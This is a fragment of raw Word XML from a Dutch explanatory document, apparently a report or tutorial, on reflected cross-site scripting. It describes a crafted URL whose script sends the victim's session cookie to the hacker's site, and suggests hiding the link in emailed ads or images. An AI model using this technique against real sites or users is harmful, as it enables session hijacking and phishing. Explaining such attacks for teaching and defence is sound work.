      <w:r w:rsidR="00DE7970">
        <w:t>hyper</w:t>
      </w:r>
      <w:r w:rsidR="00437832">
        <w:t>link</w:t>
      </w:r>
      <w:r w:rsidR="005B6948">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00316BB6">
        <w:t xml:space="preserve"> De gebruiker is ingelogd met zijn account en maakt gebruik van een sessie ID. </w:t>
      </w:r>
      <w:r w:rsidR="00636582">
        <w:t xml:space="preserve">Deze sessie </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00636582">
        <w:t>ID’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00636582">
        <w:t xml:space="preserve"> worden door de browser opgeslagen in een cookie</w:t>
      </w:r>
      <w:r w:rsidR="006858AE">
        <w:t xml:space="preserve"> bestand dat op de lokale systeem van </w:t>
      </w:r>
      <w:r w:rsidR="00F63B54">
        <w:t>het</w:t>
      </w:r>
      <w:r w:rsidR="006858AE">
        <w:t xml:space="preserve"> slachtoffer wordt geplaatst.</w:t>
      </w:r>
      <w:r w:rsidR="004444A7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00316BB6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5CEB84" w14:textId="673AC19E" w:rsidR="009631F2" w:rsidRDefault="00513CAF" w:rsidP="009631F2">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5422C8CD" wp14:editId="242646FE">
            <wp:extent cx="5760720" cy="643890"/>
            <wp:effectExtent l="0" t="0" r="0" b="381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ss-code-with-url.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643890"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBD1425" w14:textId="234485EE" w:rsidR="00114945" w:rsidRDefault="009631F2" w:rsidP="00367610">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t>Figuur 3.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D2B875" w14:textId="3FA8257F" w:rsidR="00367610" w:rsidRPr="00367610" w:rsidRDefault="00367610" w:rsidP="00367610">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251730944" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7ECD1871" wp14:editId="7927B83A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>22860</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>10795</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3437255" cy="1057910"/>
                <wp:effectExtent l="0" t="0" r="10795" b="27940"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="46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7255" cy="1057910"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:schemeClr val="bg2"/>
                        </a:solidFill>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:schemeClr val="tx1">
                              <a:lumMod val="50000"/>
                              <a:lumOff val="50000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:style>
                        <a:lnRef idx="2">
                          <a:schemeClr val="dk1"/>
                        </a:lnRef>
                        <a:fillRef idx="1">
                          <a:schemeClr val="lt1"/>
                        </a:fillRef>
                        <a:effectRef idx="0">
                          <a:schemeClr val="dk1"/>
                        </a:effectRef>
                        <a:fontRef idx="minor">
                          <a:schemeClr val="dk1"/>
                        </a:fontRef>
                      </wps:style>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="1100EC95" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00367610" w:rsidRDefault="00CE4BB5" w:rsidP="00367610">
                            <w:pPr>
                              <w:spacing w:after="0"/>
                              <w:rPr>
                                <w:lang w:val="en-GB"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00367610">
                              <w:rPr>
                                <w:lang w:val="en-GB"/>
                              </w:rPr>
                              <w:t>URL</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6B80D4D6" w14:textId="69E96969" w:rsidR="00CE4BB5" w:rsidRPr="00367610" w:rsidRDefault="00CE4BB5" w:rsidP="00367610">
                            <w:pPr>
                              <w:spacing w:after="0"/>
                              <w:rPr>
                                <w:color w:val="ED7D31" w:themeColor="accent2"/>
                                <w:lang w:val="en-GB"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="003F2F0E">
                              <w:rPr>
                                <w:sz w:val="22"/>
                                <w:lang w:val="en-GB"/>
                              </w:rPr>
                              <w:t>www.voorbeeld-xss.nl?username=Tom</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4872053C" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00367610" w:rsidRDefault="00CE4BB5" w:rsidP="00367610">
                            <w:pPr>
                              <w:spacing w:after="0"/>
                              <w:rPr>
                                <w:lang w:val="en-GB"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="593FB36D" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00367610" w:rsidRDefault="00CE4BB5" w:rsidP="00367610">
                            <w:pPr>
                              <w:spacing w:after="0"/>
                              <w:rPr>
                                <w:lang w:val="en-GB"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00367610">
                              <w:rPr>
                                <w:lang w:val="en-GB"/>
                              </w:rPr>
                              <w:t>Output:</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7BD33443" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00771C98" w:rsidRDefault="00CE4BB5" w:rsidP="00367610">
                            <w:pPr>
                              <w:spacing w:after="0"/>
                              <w:rPr>
                                <w:lang w:val="en-GB"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00771C98">
                              <w:rPr>
                                <w:lang w:val="en-GB"/>
                              </w:rPr>
                              <w:t>Hi Tom!</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7BDD4118" w14:textId="658F4049" w:rsidR="00CE4BB5" w:rsidRPr="00367610" w:rsidRDefault="00CE4BB5">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D1871" id="_x0000_s1046" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:1.8pt;margin-top:.85pt;width:270.65pt;height:83.3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lUuYICAABoBQAADgAAAGRycy9lMm9Eb2MueG1srFTbbtswDH0fsH8Q9L76krhdjThF167DgO6C&#10;tfsAxZZiI7LoSUrs9OtHSbaXdkAfhvnB0IXnkDykuLoaWkkOXJsGVEGTs5gSrkqoGrUt6M/Hu3fv&#10;KTGWqYpJULygR27o1frtm1Xf5TyFGmTFNUESZfK+K2htbZdHkSlr3jJzBh1XeClAt8ziVm+jSrMe&#10;2VsZpXF8HvWgq05DyY3B09twSdeeXwhe2m9CGG6JLCjGZv1f+//G/aP1iuVbzbq6Kccw2D9E0bJG&#10;odOZ6pZZRva6+YuqbUoNBoQ9K6GNQIim5D4HzCaJX2TzULOO+1xQHNPNMpn/R1t+PXzXpKkKujxf&#10;UqJYi0V65DtjD2xHUqdP35kczR46NLTDBxiwzj5X091DuTNEwU3N1JZfaw19zVmF8SUOGZ1AA49x&#10;JJv+C1Tohu0teKJB6NaJh3IQZMc6Hefa8MGSEg8Xy8VFmmWUlHiXxNnFZeKrF7F8gnfa2E8cWuIW&#10;BdVYfE/PDvfGunBYPpk4bwZkU901UvqNazh+IzU5MGyVzdanjohnVlKRvqCXWZoFAV5hsEMQSe5b&#10;zDawZjF+oeXwGBvzxbFzN8Xhw33m3Cn7UVW+Yy1rZFgjRqpRaqfuqLM9Su7ykuoHF1hfVDANMU8O&#10;gu9qFyo1WjqIQElm0Fjp5yBpJ9Bo62Dcv7YZGL/ubbb2HkHZGdg2CvTrYBHsp6xDrq7X7LAZfDMn&#10;i6lzN1Adsec0hKePowoXNegnSnp89gU1v/ZMc0rkZ4V9e5ksl25O+M0yu0hxo09vNqc3TJVIVVBL&#10;SVjeWD9bXFIKrrG/ReM7zwUXIhmDxufsKzyOHjcvTvfe6s+AXP8GAAD//wMAUEsDBBQABgAIAAAA&#10;IQC4oIXh3QAAAAcBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI7NTsMwEITvSLyDtUjcqFPahjbEqRAU&#10;ceohoZU4uvGSRLXXUey2gadnOcFxfjTz5evRWXHGIXSeFEwnCQik2puOGgW799e7JYgQNRltPaGC&#10;LwywLq6vcp0Zf6ESz1VsBI9QyLSCNsY+kzLULTodJr5H4uzTD05HlkMjzaAvPO6svE+SVDrdET+0&#10;usfnFutjdXIK3rZVvdispnv9Ecsy9um33RxflLq9GZ8eQUQc418ZfvEZHQpmOvgTmSCsglnKRbYf&#10;QHC6mM9XIA6s0+UMZJHL//zFDwAAAP//AwBQSwECLQAUAAYACAAAACEA5JnDwPsAAADhAQAAEwAA&#10;AAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQAjsmrh1wAA&#10;AJQBAAALAAAAAAAAAAAAAAAAACwBAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCgOVS5ggIA&#10;AGgFAAAOAAAAAAAAAAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQC4oIXh&#10;3QAAAAcBAAAPAAAAAAAAAAAAAAAAANoEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAA&#10;5AUAAAAA&#10;" fillcolor="#e7e6e6 [3214]" strokecolor="gray [1629]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="1100EC95" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00367610" w:rsidRDefault="00CE4BB5" w:rsidP="00367610">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                        <w:rPr>
                          <w:lang w:val="en-GB"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00367610">
                        <w:rPr>
                          <w:lang w:val="en-GB"/>
                        </w:rPr>
                        <w:t>URL</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6B80D4D6" w14:textId="69E96969" w:rsidR="00CE4BB5" w:rsidRPr="00367610" w:rsidRDefault="00CE4BB5" w:rsidP="00367610">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                        <w:rPr>
                          <w:color w:val="ED7D31" w:themeColor="accent2"/>
                          <w:lang w:val="en-GB"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="003F2F0E">
                        <w:rPr>
                          <w:sz w:val="22"/>
                          <w:lang w:val="en-GB"/>
                        </w:rPr>
                        <w:t>www.voorbeeld-xss.nl?username=Tom</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4872053C" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00367610" w:rsidRDefault="00CE4BB5" w:rsidP="00367610">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                        <w:rPr>
                          <w:lang w:val="en-GB"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="593FB36D" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00367610" w:rsidRDefault="00CE4BB5" w:rsidP="00367610">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                        <w:rPr>
                          <w:lang w:val="en-GB"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00367610">
                        <w:rPr>
                          <w:lang w:val="en-GB"/>
                        </w:rPr>
                        <w:t>Output:</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="7BD33443" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00771C98" w:rsidRDefault="00CE4BB5" w:rsidP="00367610">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                        <w:rPr>
                          <w:lang w:val="en-GB"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00771C98">
                        <w:rPr>
                          <w:lang w:val="en-GB"/>
                        </w:rPr>
                        <w:t>Hi Tom!</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="7BDD4118" w14:textId="658F4049" w:rsidR="00CE4BB5" w:rsidRPr="00367610" w:rsidRDefault="00CE4BB5">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-GB"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="591B9D22" w14:textId="77777777" w:rsidR="00367610" w:rsidRDefault="00367610" w:rsidP="00C41D9B"/>
    <w:p w14:paraId="207B2B66" w14:textId="77777777" w:rsidR="00367610" w:rsidRDefault="00367610" w:rsidP="00C41D9B"/>
    <w:p w14:paraId="7113951A" w14:textId="77777777" w:rsidR="00367610" w:rsidRDefault="00367610" w:rsidP="00C41D9B"/>
    <w:p w14:paraId="19C9D6C3" w14:textId="27E06CC4" w:rsidR="00537DC0" w:rsidRDefault="008044CE" w:rsidP="00C41D9B">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251732992" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="350B7C80" wp14:editId="39BDDC0C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>413596</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7038975" cy="819150"/>
                <wp:effectExtent l="0" t="0" r="28575" b="19050"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="46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8975" cy="819150"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:schemeClr val="bg2"/>
                        </a:solidFill>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:schemeClr val="tx1">
                              <a:lumMod val="50000"/>
                              <a:lumOff val="50000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="182D5170" w14:textId="427C1F54" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="006325E6">
                            <w:pPr>
                              <w:spacing w:after="0"/>
                            </w:pPr>
                            <w:r>
                              <w:t>URL</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2ECAB53B" w14:textId="1595DB93" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                            <w:proofErr w:type="gramStart"/>
                            <w:r w:rsidRPr="00537DC0">
                              <w:rPr>
                                <w:highlight w:val="yellow"/>
                              </w:rPr>
                              <w:t>http://www.voorbeeld-xss.</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00F1427D">
                              <w:rPr>
                                <w:highlight w:val="yellow"/>
                              </w:rPr>
                              <w:t>nl?username</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd"/>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B7C80" id="_x0000_s1047" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:32.55pt;width:554.25pt;height:64.5pt;z-index:251732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pkkUCAACHBAAADgAAAGRycy9lMm9Eb2MueG1srFTbbtswDH0fsH8Q9L7YzuImMeIUXboOA7oL&#10;0O4DZFmOhUiiJymxu68vJSdZ2gF7GOYHQRSlQ/Ic0qvrQStyENZJMCXNJiklwnCopdmW9Mfj3bsF&#10;Jc4zUzMFRpT0STh6vX77ZtV3hZhCC6oWliCIcUXflbT1viuSxPFWaOYm0AmDzgasZh5Nu01qy3pE&#10;1yqZpulV0oOtOwtcOIent6OTriN+0wjuvzWNE56okmJuPq42rlVYk/WKFVvLulbyYxrsH7LQTBoM&#10;eoa6ZZ6RvZV/QGnJLTho/ISDTqBpJBexBqwmS19V89CyTsRakBzXnWly/w+Wfz18t0TWJZ1dzSkx&#10;TKNIj2Ln/IHtyDTw03euwGsPHV70wwcYUOdYq+vuge8cMbBpmdmKG2uhbwWrMb8svEwuno44LoBU&#10;/ReoMQzbe4hAQ2N1IA/pIIiOOj2dtRGDJxwP5+n7xXKeU8LRt8iWWR7FS1hxet1Z5z8J0CRsSmpR&#10;+4jODvfOh2xYcboSgjlQsr6TSkUj9JvYKEsODDul2sbK8cWLW8qQvqTLfJqP9f8FwQ8jR2qvsdgR&#10;NU/xGzsOj7EvXx2HcKc8YrovgmvpcVKU1Fh+ADoiBb4/mjr2sWdSjXuEUuYoQOB8ZN8P1RC1zmYn&#10;YSuon1ASC+Nk4CTjpgX7i5Iep6Kk7ueeWUGJ+mxQ1mU2m4UxisYsn0/RsJee6tLDDEeoknpKxu3G&#10;x9ELjBu4QfkbGZUJfTJmcswZuz0ycJzMME6Xdrz1+/+xfgYAAP//AwBQSwMEFAAGAAgAAAAhAGVC&#10;uaDeAAAACAEAAA8AAABkcnMvZG93bnJldi54bWxMj71Ow0AQhHsk3uG0SHTkbIStxPgcIQiiorAB&#10;iXLjW2wr92P5NonJ0+dSQTerWc18U65na8SBpjB4pyBdJCDItV4PrlPw+fF6twQRGJ1G4x0p+KUA&#10;6+r6qsRC+6Or6dBwJ2KICwUq6JnHQsrQ9mQxLPxILno/frLI8Zw6qSc8xnBr5H2S5NLi4GJDjyM9&#10;99Tumr1V8PbetNlmlX7hN9c1j/nJbHYvSt3ezE+PIJhm/nuGC35Ehyoybf3e6SCMgjiEFeRZCuLi&#10;pskyA7GNavWQgqxK+X9AdQYAAP//AwBQSwECLQAUAAYACAAAACEA5JnDwPsAAADhAQAAEwAAAAAA&#10;AAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQAjsmrh1wAAAJQB&#10;AAALAAAAAAAAAAAAAAAAACwBAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAT+6mSRQIAAIcE&#10;AAAOAAAAAAAAAAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQBlQrmg3gAA&#10;AAgBAAAPAAAAAAAAAAAAAAAAAJ0EAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAqAUA&#10;AAAA&#10;" fillcolor="#e7e6e6 [3214]" strokecolor="gray [1629]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="182D5170" w14:textId="427C1F54" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="006325E6">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                      </w:pPr>
                      <w:r>
                        <w:t>URL</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2ECAB53B" w14:textId="1595DB93" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                      <w:proofErr w:type="gramStart"/>
                      <w:r w:rsidRPr="00537DC0">
                        <w:rPr>
                          <w:highlight w:val="yellow"/>
                        </w:rPr>
                        <w:t>http://www.voorbeeld-xss.</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00F1427D">
                        <w:rPr>
                          <w:highlight w:val="yellow"/>
                        </w:rPr>
                        <w:t>nl?username</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>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v:textbox>
                <w10:wrap type="square" anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00367610">
        <w:t>In</w:t>
      </w:r>
      <w:r w:rsidR="00D97D6D">
        <w:t xml:space="preserve"> dit scenario weet de hacker dat de website </w:t>
      </w:r>
      <w:r w:rsidR="009E189C">
        <w:t>kwetsba</w:t>
      </w:r>
      <w:r w:rsidR="003A07E5">
        <w:t xml:space="preserve">ar is tegen </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="003A07E5">
        <w:t>XSS aanvallen</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="003A07E5">
        <w:t>. De hacker bouwt een</w:t>
      </w:r>
      <w:r w:rsidR="00367610">
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r w:rsidR="003A07E5">
        <w:t xml:space="preserve">op </w:t>
      </w:r>
      <w:r w:rsidR="00367610">
        <w:t>die hij</w:t>
      </w:r>
      <w:r w:rsidR="007B398F">
        <w:t xml:space="preserve"> door </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00367610">
        <w:t>de</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00367610">
        <w:t xml:space="preserve"> slachtoffer laat uitvoeren.</w:t>
      </w:r>
      <w:r w:rsidR="0060712B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00537DC0">
        <w:t>De URL bestaat uit vier delen:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F36914" w14:textId="77777777" w:rsidR="001C433D" w:rsidRDefault="001C433D">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="359F46B7" w14:textId="600B778E" w:rsidR="00E04C21" w:rsidRPr="00A02127" w:rsidRDefault="00F2478B" w:rsidP="00537DC0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A02127">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Structuur van URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1A873F" w14:textId="5CB20CBB" w:rsidR="00537DC0" w:rsidRDefault="00537DC0" w:rsidP="00537DC0">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="004E0653">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00F1427D">
        <w:t>URL plus</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00F1427D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006432FD">
        <w:t xml:space="preserve">de </w:t>
      </w:r>
      <w:r w:rsidR="00F1427D">
        <w:t>query</w:t>
      </w:r>
      <w:r w:rsidR="006432FD">
        <w:t xml:space="preserve"> username</w:t>
      </w:r>
      <w:r w:rsidR="00F1427D">
        <w:t xml:space="preserve"> van de website</w:t>
      </w:r>
      <w:r w:rsidR="007945AE">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7592EBB6" w14:textId="19162A5B" w:rsidR="00537DC0" w:rsidRDefault="00537DC0" w:rsidP="00537DC0">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00F1427D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00997215">
        <w:t xml:space="preserve">HTML script element met de javascript </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00997215">
        <w:t>Windows.location.href</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00997215" w:rsidRPr="00997215">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00997215">
        <w:t xml:space="preserve"> functie</w:t>
      </w:r>
      <w:r w:rsidR="00F71AFA">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B86DC2A" w14:textId="08C1D8F7" w:rsidR="00BE4C54" w:rsidRDefault="00537DC0" w:rsidP="00246A84">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="00997215">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006432FD">
        <w:t>de URL van de hacke</w:t>
      </w:r>
      <w:r w:rsidR="00B40742">
        <w:t xml:space="preserve">rs website met als query cookie en als waarde </w:t>
      </w:r>
      <w:r w:rsidR="00B66F62">
        <w:t>het</w:t>
      </w:r>
      <w:r w:rsidR="00B40742">
        <w:t xml:space="preserve"> coo</w:t>
      </w:r>
      <w:r w:rsidR="009E6BD4">
        <w:t xml:space="preserve">kie van </w:t>
      </w:r>
      <w:r w:rsidR="00B66F62">
        <w:t>het</w:t>
      </w:r>
      <w:r w:rsidR="009E6BD4">
        <w:t xml:space="preserve"> slachtoffer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F6F5CF" w14:textId="77777777" w:rsidR="00246A84" w:rsidRDefault="00246A84" w:rsidP="00246A84">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DE3C516" w14:textId="77777777" w:rsidR="00E04605" w:rsidRPr="006B346C" w:rsidRDefault="00E04605" w:rsidP="00E04605">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B346C">
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploiteren van </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>kwetsbaarheid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658423CB" w14:textId="39C51D2E" w:rsidR="00D327A4" w:rsidRPr="00D327A4" w:rsidRDefault="00D327A4" w:rsidP="00C41D9B">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D327A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Voorwaarden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486EF85E" w14:textId="03C2C3C9" w:rsidR="003209E6" w:rsidRDefault="006E63E7" w:rsidP="00C41D9B">
      <w:r>
        <w:t xml:space="preserve">Voor de werking van deze </w:t>
      </w:r>
      <w:r w:rsidR="00B66F62">
        <w:t>XSS-aanval</w:t>
      </w:r>
      <w:r w:rsidR="00BC7AC7">
        <w:t xml:space="preserve"> is het nodig dat de gebrui</w:t>
      </w:r>
      <w:r w:rsidR="009969F2">
        <w:t xml:space="preserve">ker is ingelogd, want anders is er geen sessie </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009969F2">
        <w:t>id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009969F2">
        <w:t xml:space="preserve"> gegenereerd en dus ook geen kwetsbaarheid om te exploiteren. Dit betekend dat de website enkel kwetsbaar wordt a</w:t>
      </w:r>
      <w:r w:rsidR="00CF2238">
        <w:t>ls er gebruikers ingelogd zijn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9D74D2" w14:textId="24245A30" w:rsidR="00CF2238" w:rsidRDefault="004171DF" w:rsidP="00C41D9B">
      <w:r>
        <w:t xml:space="preserve">De exploitatie kan op elke website gebeuren waar gebruikerscontent gepubliceerd kan worden. </w:t>
      </w:r>
      <w:r w:rsidR="00147D19">
        <w:t xml:space="preserve">Een ander manier is om de selectie van slachtoffers een email te sturen met de link, het liefst verbogen in een klikbare afbeelding </w:t>
      </w:r>
      <w:r w:rsidR="009E01CD">
        <w:t xml:space="preserve">zoals een advertentie </w:t>
      </w:r>
      <w:r w:rsidR="00147D19">
        <w:t xml:space="preserve">of een uitnodigende hyperlink. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AED977A" w14:textId="77DA8FB1" w:rsidR="009E01CD" w:rsidRDefault="006B40B9" w:rsidP="00C41D9B">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251735040" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="66712F10" wp14:editId="0E6B2512">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>23072</wp:posOffset>
                </wp:positionH>
